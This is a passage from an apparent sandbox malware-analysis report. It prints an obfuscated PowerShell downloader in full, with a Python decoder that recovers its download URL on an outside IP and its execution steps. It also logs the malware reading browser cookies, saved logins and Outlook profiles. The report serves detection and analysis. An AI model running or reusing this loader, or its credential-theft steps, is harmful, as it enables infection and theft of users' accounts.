lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). ');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . 
dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(d Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). 
');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(d Jump to behavior
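The command lines above carry their own decoder: `unkaiserlike` walks its argument from index 1 in steps of 2 and stops before the last character, so the plaintext is the odd-indexed characters and everything else is padding, and `Hydrolyzable` dot-sources `$Porsitets`, which decodes to `iex`, so every `Hydrolyzable (unkaiserlike '...')` call is an Invoke-Expression of one decoded statement. The Python below is an added example, not part of the report, that ports the decoder and runs it over literals copied verbatim from the recorded command line; the excerpt is assembled from five of those literals with the rest of the script cut away.

```python
import re


def unkaiserlike(blob: str) -> str:
    """Port of the decoder embedded in the recorded command line. The PowerShell
    loop is  For($i=1; $i -lt $blob.Length-1; $i+=2){ $out += $blob.Substring($i,1) }
    so odd-indexed characters are plaintext; index 0, the even indices and the
    final character are junk."""
    return blob[1:len(blob) - 1:2]


# The script never places a quote inside an obfuscated literal, so one pattern
# recovers the argument of every `unkaiserlike '...'` call.
LITERAL_RE = re.compile(r"unkaiserlike\s+'([^']*)'")


def decode_command_line(command_line: str) -> list:
    """Decode every obfuscated literal in the order the script assigns them."""
    return [unkaiserlike(raw) for raw in LITERAL_RE.findall(command_line)]


# Literals copied verbatim from the powershell.exe command line in this report,
# with the surrounding script reduced to these five assignments.
COMMAND_LINE_EXCERPT = (
    r"$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';"
    r"$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';"
    r"$Heitiki=unkaiserlike 'T>S ';"
    r"$Porsitets=unkaiserlike ' iUeLx ';"
    r"$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';"
)

if __name__ == "__main__":
    labels = ("User-Agent header", "download URL", "URL separator", "invoker", "cmd.exe line")
    for label, value in zip(labels, decode_command_line(COMMAND_LINE_EXCERPT)):
        print(f"{label:18} {value}")
```

The fifth plaintext is exactly the `cmd.exe /c "echo %appdata%\Thermoswitch172.Med && echo $"` child recorded in this section, which is the check that the port is faithful: that child exists only to hand back the expanded drop path and a literal `$` as the two elements of `$Algum`, and the cleartext `$Entertaineres=$Algum[1]+$Entertaineres` prepends that `$` to `Ripplers.DownloadFile(...)` before it is invoked. The other decoded literals show the rest of the flow: the URL string is split on `>` into `$Datamaskinerne` so several download locations can be tried, a `System.Net.WebClient` with a Firefox User-Agent fetches to the drop path, the `while (!$Propagerende)` loop re-runs the download with `Start-Sleep 4` until `Test-Path` succeeds, and the file is then read with `Get-Content` and handed to `[System.Convert]::FromBase64String`, where the recorded command line is cut off. One caveat when decoding from the rendered report: literals whose plaintext contains two consecutive spaces, such as the `$Alcoholmeter` User-Agent value, come out garbled after the first double space because the rendering collapsed runs of whitespace. For those, decode the raw command line from the sandbox export or from command-line logging (Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled) rather than from the page text.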
Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY